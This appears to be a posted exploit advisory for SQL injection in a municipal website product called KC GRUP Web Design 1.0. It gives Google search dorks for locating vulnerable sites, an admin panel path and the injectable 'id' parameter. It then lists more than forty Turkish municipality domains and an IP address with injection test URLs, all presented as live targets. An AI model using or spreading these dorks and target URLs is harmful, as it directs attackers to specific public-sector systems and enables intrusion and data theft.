#################################################################################################

# Exploit Title : KC GRUP Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 03/12/2018
# Vendor Homepage : kcgrup.com ~ kcgrupsms.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks :
intext:''Copyright A(c) 2014-2018 Belediye - TA1/4m haklarA+- saklA+-dA+-r. - Design by
KC GRUP''
intext:Design by KC GRUP - Belediye Sitesi site:bel.tr
inurl:''/haberdetay.php?id=''
intext:Design by KC GRUP'' site:bel.tr
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2260
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

panel.kcgrupsms.com

#################################################################################################

# SQL Injection Exploit :

/haberdetay.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

Turkish Government Official Municipality WebSites are vulnerable for this
security issue.

85.95.249.117 IP Address is vulnerable.

[+] guce.bel.tr/haberdetay.php?id=86%27

[+] kofcaz.bel.tr/haberdetay.php?id=86%27

[+] solhan.bel.tr/haberdetay.php?id=86%27

[+] tutak.bel.tr/haberdetay.php?id=86%27

[+] adakli.bel.tr/haberdetay.php?id=86%27

[+] meric.bel.tr/haberdetay.php?id=86%27

[+] karssusuz.bel.tr/haberdetay.php?id=86%27

[+] konuklar.bel.tr/haberdetay.php?id=86%27

[+] mazgirt.bel.tr/haberdetay.php?id=86%27

[+] kofcaz.bel.tr/haberdetay.php?id=86%27

[+] karliova.bel.tr/haberdetay.php?id=86%27

[+] saphane.bel.tr/haberdetay.php?id=86%27

[+] adakli.bel.tr/haberdetay.php?id=86%27

[+] kavakli.bel.tr/haberdetay.php?id=86%27

[+] balikoy.bel.tr/haberdetay.php?id=86%27

[+] duzici.bel.tr/haberdetay.php?id=86%27

[+] pazarlar.bel.tr/haberdetay.php?id=86%27

[+] yozgatdogankent.bel.tr/haberdetay.php?id=86%27

[+] corumortakoy.bel.tr/haberdetay.php?id=86%27

[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27

[+] deredolu.bel.tr/haberdetay.php?id=86%27

[+] gelendost.bel.tr/haberdetay.php?id=86%27

[+] sutculer.bel.tr/haberdetay.php?id=86%27

[+] akharim.bel.tr/haberdetay.php?id=86%27

[+] kazanci.bel.tr/haberdetay.php?id=86%27

[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27

[+] halfeli.bel.tr/haberdetay.php?id=86%27

[+] kovanlik.bel.tr/haberdetay.php?id=86%27

[+] sultanhani.bel.tr/haberdetay.php?id=86%27

[+] sambayat.bel.tr/haberdetay.php?id=86%27

[+] meric.bel.tr/haberdetay.php?id=86%27

[+] cimitekke.bel.tr/haberdetay.php?id=86%27

[+] uludere.bel.tr/haberdetay.php?id=86%27

[+] demirkoy.bel.tr/haberdetay.php?id=86%27

[+] bereketli.bel.tr/haberdetay.php?id=86%27

[+] uzgorur.bel.tr/haberdetay.php?id=86%27

[+]  akpazar.bel.tr/haberdetay.php?id=86%27

[+] ardanuc.bel.tr/haberdetay.php?id=86%27

[+] guneyyurt.bel.tr/haberdetay.php?id=86%27

[+] olukozu.bel.tr/haberdetay.php?id=86%27

[+] buyukkalecik.bel.tr/haberdetay.php?id=86%27

[+] altinbasak.bel.tr/haberdetay.php?id=86%27

[+] hatipli.bel.tr/haberdetay.php?id=86%27

[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27

#################################################################################################

# Example SQL Database Error :

Warning: Cannot modify header information - headers already sent by (output
started at /home/guce/

public_html/baglan.php:7) in /home/guce/public_html/haberdetay.php on line
101

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################